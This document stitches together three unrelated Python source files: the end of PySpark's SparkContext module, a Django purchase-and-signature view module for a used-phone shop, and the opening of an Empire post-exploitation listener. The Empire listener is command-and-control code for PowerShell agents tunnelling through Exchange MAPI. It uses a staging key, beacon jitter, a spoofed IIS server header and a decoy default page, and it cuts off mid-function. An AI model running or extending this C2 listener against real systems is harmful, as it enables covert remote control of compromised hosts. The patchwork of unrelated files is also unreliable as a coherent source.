Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
['Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
gw = SparkContext._gateway
jvm = SparkContext._jvm
jrdd_cls = jvm.org.apache.spark.api.java.JavaRDD
jpair_rdd_cls = jvm.org.apache.spark.api.java.JavaPairRDD
jdouble_rdd_cls = jvm.org.apache.spark.api.java.JavaDoubleRDD
if is_instance_of(gw, rdds[0]._jrdd, jrdd_cls):
cls = jrdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jpair_rdd_cls):
cls = jpair_rdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jdouble_rdd_cls):
cls = jdouble_rdd_cls
else:
cls_name = rdds[0]._jrdd.getClass().getCanonicalName()
raise TypeError("Unsupported Java RDD class %s" % cls_name)
jrdds = gw.new_array(cls, len(rdds))
for i in range(0, len(rdds)):
jrdds[i] = rdds[i]._jrdd
return RDD(self._jsc.union(jrdds), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a :class:`Broadcast`
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an :class:`Accumulator` with the given initial value, using a given
:class:`AccumulatorParam` helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The `path` passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use :meth:`SparkFiles.get` with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The `path` passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be an HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use :meth:`SparkContext.cancelJobGroup` to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
.. note:: Currently, setting a group ID (set to local properties) with multiple threads
does not properly work. Internally threads on PVM and JVM are not synced, and JVM
thread can be reused for multiple threads on PVM, which fails to isolate local
properties for each thread on PVM.
To avoid this, enable the pinned thread mode by setting ``PYSPARK_PIN_THREAD``
environment variable to ``true`` and uses :class:`pyspark.InheritableThread`.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
.. note:: Currently, setting a local property with multiple threads does not properly work.
Internally threads on PVM and JVM are not synced, and JVM thread
can be reused for multiple threads on PVM, which fails to isolate local properties
for each thread on PVM.
To avoid this, enable the pinned thread mode by setting ``PYSPARK_PIN_THREAD``
environment variable to ``true`` and uses :class:`pyspark.InheritableThread`.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
:meth:`setLocalProperty`.
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
.. note:: Currently, setting a job description (set to local properties) with multiple
threads does not properly work. Internally threads on PVM and JVM are not synced,
and JVM thread can be reused for multiple threads on PVM, which fails to isolate
local properties for each thread on PVM.
To avoid this, enable the pinned thread mode by setting ``PYSPARK_PIN_THREAD``
environment variable to ``true`` and uses :class:`pyspark.InheritableThread`.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See :meth:`SparkContext.setJobGroup`.
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
@property
def resources(self):
resources = {}
jresources = self._jsc.resources()
for x in jresources:
name = jresources[x].name()
jaddresses = jresources[x].addresses()
addrs = [addr for addr in jaddresses]
resources[name] = ResourceInformation(name, addrs)
return resources
@staticmethod
def _assert_on_driver():
"""
Called to ensure that SparkContext is created only on the Driver.
Throws an exception if a SparkContext is about to be created in executors.
"""
if TaskContext.get() is not None:
raise Exception("SparkContext should only be created and accessed on the driver.")
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
compras.py
|
# -*- coding: utf-8 -*-
# @Author: Manuel Rodriguez <valle>
# @Date: 28-Aug-2017
# @Email: valle.mrv@gmail.com
# @Filename: views.py
# @Last modified by: valle
# @Last modified time: 02-Mar-2018
# @License: Apache license vesion 2.0
from django.forms.models import model_to_dict
from django.db.models import Q
from django.conf import settings
from django.shortcuts import render, redirect
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
from django.contrib.auth.decorators import login_required, permission_required
from django.template.loader import render_to_string
from django.http import HttpResponse
#from django.template import Context
from django.template.loader import get_template
from adminshop.utility import get_documento_compra, get_documento_testeo
from adminshop.forms import (CPClientesForm, CPProductosForm, ProductosForm, MODProductosForm,
FinTratoForm, ValidarCompra, VistaValidarForm, ModelosForm)
from adminshop.models import (Modelos, Clientes, Testeo, ConfigSite, Historial, Firmas,
Productos, Compras, Tipos, Direcciones, DocumentoTesteo, ListaTesteo)
from adminshop.utility import save_historial, save_doc_firmas, save_doc_testeo
from . import (validoDNI, get_first_direccion, set_first_direccion)
from tokenapi.http import JsonResponse
import threading
import base64
import json
import trml2pdf
import os
@login_required(login_url='login_tk')
def get_modificar_compra(request, id_compra):
pres = Compras.objects.filter(pk=id_compra)
if len(pres) > 0:
pres = pres[0]
vendedor = pres.get_vendedor()
producto = pres.producto
producto_dict = model_to_dict(producto)
producto_dict["cliente"] = vendedor['id']
f_compra = MODProductosForm(producto_dict)
modelo = producto.modelo
return render (request, "tienda/compras/modificar.html",
{"c": vendedor,
"form": f_compra,
"m": modelo,
"f": pres})
return redirect("tienda")
@login_required(login_url='login_tk')
def modificar_compra(request, id_compra):
if request.method == "POST":
pres = Compras.objects.filter(pk=id_compra)
if len(pres) > 0:
pres = pres[0]
producto = pres.producto
producto.tipo_id = request.POST["tipo"]
producto.color = request.POST["color"]
producto.modelo_id = request.POST["modelo"]
producto.ns_imei = request.POST["ns_imei"]
producto.precio_compra = request.POST["precio_compra"]
producto.save()
pres.vendedor_id = request.POST["cliente"]
pres.save()
return HttpResponse(reverse("listado_compras"))
@login_required(login_url='login_tk')
def ch_find_modelo(request):
if request.method == "POST":
filter = request.POST["filter"]
filter_query = Modelos.objects.filter(Q(nombre__contains=filter) |
Q(marca__nombre__contains=filter))
return render(request, "tienda/compras/lista_modelos.html",
{'query': filter_query,
'change': True })
@login_required(login_url='login_tk')
def cancelar_trato(request, id_producto):
if request.method == "POST":
producto = Productos.objects.get(pk=id_producto)
f_p = FinTratoForm(request.POST, instance=producto)
if f_p.is_valid():
p = f_p.save()
p.estado = "CT"
p.save()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
#guardamos un historial de la accion realizada
save_historial(request.user.id, p.id, cliente_id,
"Rechazada la compra del producto..")
vaciar_sesison_compra(request)
return HttpResponse(reverse("tienda"))
else:
p = Productos.objects.get(pk=id_producto)
p.estado = "CT"
p.save()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
#guardamos un historial de la accion realizada
save_historial(request.user.id, p.id, cliente_id,
"Rechazada la compra del producto..")
vaciar_sesison_compra(request)
return redirect("lista_productos", estado="TD")
@login_required(login_url='login_tk')
def validar_compra(request, id_compra):
if request.method == "POST":
compra = Compras.objects.get(pk=id_compra)
f = ValidarCompra(request.POST, instance=compra)
if f.is_valid():
compra = f.save()
vaciar_sesison_compra(request)
#Guardamos el documento en la cola para ser firmado
save_doc_firmas(request.user.pk, compra.pk, "CP")
return redirect("tienda")
else:
f = VistaValidarForm(instance=compra)
return render(request, "tienda/compras/validar_compra.html",
{"form": f, "form_error": f.errors })
else:
compra = Compras.objects.get(pk=id_compra)
f = VistaValidarForm(instance=compra)
return render(request, "tienda/compras/validar_compra.html",
{"form": f, })
@login_required(login_url='login_tk')
def send_sign(request, id_producto):
producto = Productos.objects.get(pk=id_producto)
compras = Compras.objects.filter(producto__id=id_producto)
if len(compras) > 0:
compra = compras[0]
Firmas.objects.filter(Q(documento_id=compra.pk) &
Q(tipo_documento="CP")).delete()
threading.Thread(target=send_men_sing, args=(compra,)).start()
return render(request, "tienda/compras/sender_sign.html")
@login_required(login_url='login_tk')
def get_document_by_id(request, id_producto):
producto = Productos.objects.get(pk=id_producto)
compras = Compras.objects.filter(producto__id=id_producto)
compra = Compras()
if len(compras) > 0:
compra = compras[0]
return get_document(producto, compra)
@login_required(login_url='login_tk')
def find_cliente(request):
vaciar_sesison_compra(request)
if request.method == "POST" and "DNI" in request.POST:
if validoDNI(request.POST["DNI"]):
return cp_clientes(request)
else:
return render(request, 'tienda/compras/find_cliente.html',{
"mensaje": "DNI no valido",
"url_tipo": reverse("find_cliente")
})
return render(request, 'tienda/compras/find_cliente.html',{
"url_tipo": reverse("find_cliente")
})
@login_required(login_url='login_tk')
def listado_doc_testeos(request):
testeos = DocumentoTesteo.objects.all()
return render(request, 'tienda/testeo/listado.html',{
"compras": testeos
})
@login_required(login_url='login_tk')
def find_doc_testeos(request):
filter = request.POST["filter"]
if len(filter) > 0 and filter[0].upper() == "T":
filter = filter.replace("T", "")
filter = filter.replace("t", "")
compras = DocumentoTesteo.objects.filter(Q(pk=filter))
else:
compras = DocumentoTesteo.objects.filter(Q(cliente__DNI__contains=filter)|
Q(cliente__nombre_completo__contains=filter))
return render(request, 'tienda/testeo/listado_ajax.html',{
"compras": compras
})
@login_required(login_url='login_tk')
def get_doc_testeo_by_id(request, id_doc):
doc = DocumentoTesteo.objects.get(pk=id_doc)
return doc_testeo(doc)
@login_required(login_url='login_tk')
def cp_clientes(request):
if request.method == 'POST':
if "filter" in request.POST:
clientes = Clientes.objects.filter(DNI__icontains=request.POST.get('DNI'))
if len(clientes) > 0:
direccion = get_first_direccion(clientes[0].id)
full_data = dict(model_to_dict(direccion).items() + model_to_dict(clientes[0]).items())
form = CPClientesForm (full_data, instance=clientes[0])
titulo = 'Cliente existente'
tipo = "comprar"
request.session["accion_comprar_dni"] = request.POST.get('DNI')
request.session["accion_comprar_pk_cliente"] = clientes[0].pk
else:
form = CPClientesForm(request.POST)
titulo = 'Cliente no existe'
tipo = "no_existe"
return render(request, 'tienda/compras/clientes_ajax.html',
{'form':form, 'titulo': titulo,
'tipo': tipo})
elif len(request.POST) == 2 and "DNI" in request.POST:
clientes = Clientes.objects.filter(DNI__icontains=request.POST.get('DNI'))
if len(clientes) > 0:
direccion = get_first_direccion(clientes[0].id)
full_data = dict(model_to_dict(direccion).items() + model_to_dict(clientes[0]).items())
form = CPClientesForm (full_data, instance=clientes[0])
titulo = 'Cliente existente'
tipo = "comprar"
request.session["accion_comprar_dni"] = request.POST.get('DNI')
request.session["accion_comprar_pk_cliente"] = clientes[0].pk
else:
form = CPClientesForm(request.POST)
titulo = 'Cliente no existe'
tipo = "no_existe"
return render(request, 'tienda/compras/clientes.html',
{'form':form, 'titulo': titulo,
'tipo': tipo})
elif len(request.POST) > 2:
tipo = "comprar"
clientes = Clientes.objects.filter(DNI__icontains=request.POST.get('DNI'))
request.session["accion_comprar_dni"] = request.POST.get('DNI')
if len(clientes) > 0:
form = CPClientesForm(request.POST, instance=clientes[0])
else:
form = CPClientesForm(request.POST)
if form.is_valid():
cliente = form.save()
direccion = set_first_direccion(request.POST, cliente.pk)
if type(direccion) == Direcciones:
direccion.cliente_id = cliente.pk
direccion.save()
else:
return render(request, 'tienda/compras/clientes.html',
{'form':form, 'titulo': "Error al guardar el cliente",
'tipo': tipo, "form_error": form.errors})
request.session["accion_comprar_pk_cliente"] = cliente.pk
return render(request, 'tienda/compras/clientes.html',
{'form':form, 'titulo': "Cliente guardado o modificado",
'tipo': tipo})
return redirect("find_cliente")
@login_required(login_url='login_tk')
def listado_compras(request):
compras = Compras.objects.all().exclude(tipo_vendedor="NO")
return render(request, 'tienda/compras/listado.html',{
"compras": compras
})
@login_required(login_url='login_tk')
def find_compra(request):
filter = request.POST["filter"]
if len(filter) > 0 and "c" == filter[0].lower():
filter = filter.replace("C", "")
filter = filter.replace("c", "")
compras = Compras.objects.filter(Q(codigo_compra__icontains=filter)).exclude(vendedor_id=None)
else:
compras = Compras.objects.filter(Q(codigo_compra__icontains=filter)|
Q(producto__ns_imei__icontains=filter)).exclude(vendedor_id=None)
return render(request, 'tienda/compras/listado_ajax.html',{
"compras": compras
})
@login_required(login_url='login_tk')
def cp_lista_modelos(request):
if request.method == "POST":
filter = request.POST["filter"]
filter_query = Modelos.objects.filter(Q(nombre__icontains=filter))
return render(request, "tienda/compras/lista_modelos.html", {'query': filter_query})
@login_required(login_url='login_tk')
def send_para_tester(request, id_modelo):
if "accion_comprar_dni" in request.session:
try:
producto = Productos.objects.get(ns_imei=request.POST.get("ns_imei"))
form = CPProductosForm(request.POST, instance=producto)
except Exception as p:
form = CPProductosForm(request.POST)
if form.is_valid():
producto = form.save(commit=False)
producto.modelo_id = request.session["accion_comprar_pk_modelo"]
producto.estado = "OS"
producto.tipo_id = 1
producto.precio_compra = producto.modelo.precio_usado
producto.save()
request.session["accion_comprar_pk_producto"] = producto.pk
#Guardamos el histarial de la accion Realizada
save_historial(request.user.pk, request.session["accion_comprar_pk_cliente"],
producto.pk, "Entrada para testeo posible compra")
#Creamos el documento de recepción de terminal.
doc = save_doc_testeo(request.user.pk, request.session["accion_comprar_pk_cliente"],
producto.pk)
#Guradamos el documen to para firmar
save_doc_firmas(request.user.pk, doc.id, "OS")
vaciar_sesison_compra(request)
return JsonResponse({"result": True})
else:
return redirect("tienda")
@login_required(login_url='login_tk')
def cp_productos(request, id_modelo=-1):
if "accion_comprar_dni" in request.session:
if request.method != "POST" and id_modelo < 0:
f_modelo = ModelosForm()
return render(request, 'tienda/compras/find_modelos.html',
{"form": f_modelo})
elif request.method != "POST" and id_modelo > 0:
request.session["accion_comprar_pk_modelo"] = id_modelo
try:
modelo = Modelos.objects.get(pk=id_modelo)
except:
modelo = Modelos()
tipo = "no_existe"
form = CPProductosForm()
return render(request, 'tienda/compras/productos.html',
{'form':form, 'titulo': "Datos del producto",
'modelo': modelo,
'tipo': tipo})
else:
try:
producto = Productos.objects.get(ns_imei=request.POST.get("ns_imei"))
form = CPProductosForm(request.POST, instance=producto)
except Exception as p:
form = CPProductosForm(request.POST)
if form.is_valid():
producto = form.save(commit=False)
if "accion_comprar_pk_modelo" not in request.session:
vaciar_sesison_compra(request)
return redirect("tienda")
producto.modelo_id = request.session["accion_comprar_pk_modelo"]
producto.estado = "TD"
#tipos = Tipos.objects.all()
#if len(tipos) > 0:
# tipo = tipos[0].pk
#else:
# tipo = -1
#producto.tipo_id = tipo
producto.precio_compra = producto.modelo.precio_usado
producto.save()
request.session["accion_comprar_pk_producto"] = producto.pk
save_historial(request.user.pk, request.session["accion_comprar_pk_cliente"],
request.session["accion_comprar_pk_producto"],
"Producto comprado sin testear")
form = ProductosForm(instance=producto)
return render(request, 'tienda/compras/compras.html',
{'form':form, 'titulo': "Datos del producto",
"form_error": form.errors,
"id_modelo": request.session["accion_comprar_pk_modelo"]})
else:
return redirect("tienda")
@login_required(login_url='login_tk')
def calcular_precio_usado(request, id_modelo):
if request.method == "POST":
tipo = Tipos.objects.get(pk=request.POST["tipo"])
modelo = Modelos.objects.get(pk=id_modelo)
return HttpResponse("{0:.2f}".format(float(tipo.incremento)*float(modelo.precio_usado)))
else:
return redirect("tienda")
@login_required(login_url='login_tk')
def hacer_compra(request):
if request.method == "POST":
try:
producto = Productos.objects.get(pk=request.session["accion_comprar_pk_producto"])
producto.tipo_id = request.POST["tipo"]
producto.precio_compra = request.POST["precio_compra"]
producto.estado = "ST"
producto.save()
except Exception as error:
return HttpResponse(reverse("en_construccion"))
estan_todos = True
estan_todos = estan_todos and "accion_comprar_pk_cliente" in request.session
estan_todos = estan_todos and "accion_comprar_pk_producto" in request.session
estan_todos = estan_todos and "accion_comprar_pk_modelo" in request.session
if estan_todos:
compra = guardar_compra(request.session["accion_comprar_pk_cliente"],
request.session["accion_comprar_pk_producto"],
request.user.id,
"Realizada la compra del producto")
return HttpResponse(reverse("validar_compra", args=[str(compra.id)]))
else:
return HttpResponse(reverse("tienda"))
@login_required(login_url='login_tk')
def trato_compra(request, id_producto):
if request.method == "POST":
producto = Productos.objects.get(pk=id_producto)
f_p = FinTratoForm(request.POST, instance=producto)
if f_p.is_valid():
p = f_p.save()
p.estado = "ST"
p.save()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
compra = guardar_compra(cliente_id, p.id, request.user.id,
"Realizada la compra del producto. Despues de testear")
return HttpResponse(reverse("validar_compra", args=[compra.id]))
else:
producto = Productos.objects.get(pk=id_producto)
if producto.tipo == None:
producto.tipo = Tipos.objects.all()[0]
producto.precio_compra = "{0:.2f}".format(producto.modelo.precio_usado *
producto.tipo.incremento)
producto.save()
filter_query = Testeo.objects.filter(producto_id=id_producto)
lista_ids = filter_query.values_list("descripcion_id", flat=True)
no_realizaos = ListaTesteo.objects.filter(categoria=producto.modelo.categoria)
return render(request, "tienda/compras/trato_compra.html",
{'query': filter_query.exclude(estado="OK"), "p": producto,
"no_realizados": no_realizaos.exclude(pk__in=lista_ids),
"form": FinTratoForm(instance=producto)})
@login_required(login_url='login_tk')
def cancelar_compra(request):
if request.method == "POST":
try:
producto = Productos.objects.get(pk=request.session["accion_comprar_pk_producto"])
producto.tipo_id = request.POST["tipo"]
producto.precio_compra = request.POST["precio_compra"]
producto.estado = "CT"
producto.save()
except:
return HttpResponse(reverse("tienda"))
estan_todos = True
estan_todos = estan_todos and "accion_comprar_pk_cliente" in request.session
estan_todos = estan_todos and "accion_comprar_pk_producto" in request.session
estan_todos = estan_todos and "accion_comprar_pk_modelo" in request.session
if estan_todos:
#Guardamos historial de la cancelacion de la comprar
save_historial(request.user.id, request.session["accion_comprar_pk_cliente"],
request.session["accion_comprar_pk_producto"],
"Compra cancelada, producto en posesion del cliente")
vaciar_sesison_compra(request)
return HttpResponse(reverse("tienda"))
else:
return HttpResponse(reverse("en_construccion"))
@login_required(login_url='login_tk')
def salir_compra(request):
try:
producto = Productos.objects.get(pk=request.session["accion_comprar_pk_producto"])
producto.estado = "CT"
producto.save()
except:
pass
vaciar_sesison_compra(request)
return redirect("tienda")
def guardar_compra(cliente_id, producto_id, user_id, detalle):
compra = Compras()
compra.vendedor_id = cliente_id
compra.tipo_vendedor = 'CL'
compra.producto_id = producto_id
compra.usuario_id = user_id
compra.save()
#Guardamos el historial
save_historial(user_id, cliente_id, user_id, detalle)
return compra
def vaciar_sesison_compra(request):
if "accion_comprar_pk_cliente" in request.session:
del request.session["accion_comprar_pk_cliente"]
if "accion_comprar_pk_producto" in request.session:
del request.session["accion_comprar_pk_producto"]
if "accion_comprar_pk_modelo" in request.session:
del request.session["accion_comprar_pk_modelo"]
if "accion_comprar_dni" in request.session:
del request.session["accion_comprar_dni"]
def get_document_by_code(request, code):
datos = json.loads(base64.b64decode(code))
compras = Compras.objects.filter(pk=datos["id_compra"])
compra = Compras()
if len(compras) > 0:
compra = compras[0]
producto = Productos.objects.get(pk=compra.producto.pk)
return get_document(producto, compra)
return redirect('https://google.es')
def get_document(producto, compra):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'inline; filename="%s.pdf"' % producto.modelo
doc_compra = get_documento_compra(producto, compra)
response.write(doc_compra.getvalue())
return response
def send_men_sing(compra):
vendedor = compra.get_vendedor()
datos = {
"id_compra": compra.id,
"codigo_compra": str(compra.codigo_compra),
"email": vendedor['email'],
}
send_data = base64.b64encode(json.dumps(datos))
url = settings.BASE_URL + reverse("sign_compra", args=[send_data])
from django.core.mail import send_mail
from django.template.loader import render_to_string
msg_plain = render_to_string(settings.BASE_DIR+'/templates/email/url_sign.html',
{'nombre': vendedor['nombre'],
"url": url})
send_mail(
'Firmar y aceptar condiciones',
msg_plain,
"info@freakmedia.es",
[datos['email']],
)
def sign_compra(request, code):
datos = json.loads(base64.b64decode(code))
compras = Compras.objects.filter(pk=datos["id_compra"])
datos_send = None
if len(compras) > 0:
compra = compras[0]
if compra.firma == '':
vendedor = compra.get_vendedor()
datos_send= {
"pk": datos["id_compra"],
"id_producto": compra.producto.pk,
"nombre": vendedor["nombre"],
"telefono": vendedor['telefono'],
"DNI": vendedor["DNI"].upper(),
"domicilio": vendedor['direccion'],
"ns_imei": compra.producto.ns_imei,
"precio_compra": str(compra.producto.precio_compra),
"code": code
}
return render(request, "tienda/compras/sign.html", {"datos":datos_send})
else:
return redirect("get_document_by_code", code=code )
return redirect('tienda')
def doc_testeo(doc):
tmpl_path = settings.DOCUMENT_TMPL
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'inline; filename="testeo_%s.pdf"' % doc.producto
pdfstr = get_documento_testeo(doc)
response.write(pdfstr.getvalue())
return response
|
http_mapi.py
|
import logging
import base64
import random
import os
import ssl
import time
import copy
from pydispatch import dispatcher
from flask import Flask, request, make_response
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] + MAPI',
'Author': ['@harmj0y','@_staaldraad'],
'Description': ('Starts a http[s] listener (PowerShell) which can be used with Liniaal for C2 through Exchange'),
'Category' : ('client_server'),
'Comments': ['This requires the Liniaal agent to translate messages from MAPI to HTTP. More info: https://github.com/sensepost/liniaal']
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'mapi'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 0
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'TServer header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'Folder' : {
'Description' : 'The hidden folder in Exchange to user',
'Required' : True,
'Value' : 'Liniaal'
},
'Email' : {
'Description' : 'The email address of our target',
'Required' : False,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
page = "<html><body><h1>It works!</h1>"
page += "<p>This is the default web page for this server.</p>"
page += "<p>The web server software is running but no content has been added, yet.</p>"
page += "</body></html>"
return page
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
